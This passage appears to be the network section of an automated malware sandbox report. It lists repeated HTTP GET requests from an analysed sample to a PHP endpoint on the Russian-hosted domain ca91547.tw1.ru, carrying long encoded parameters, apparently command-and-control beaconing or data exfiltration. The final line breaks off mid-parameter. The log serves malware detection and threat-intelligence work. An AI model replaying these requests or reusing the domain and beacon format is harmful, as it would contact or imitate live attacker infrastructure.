Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxW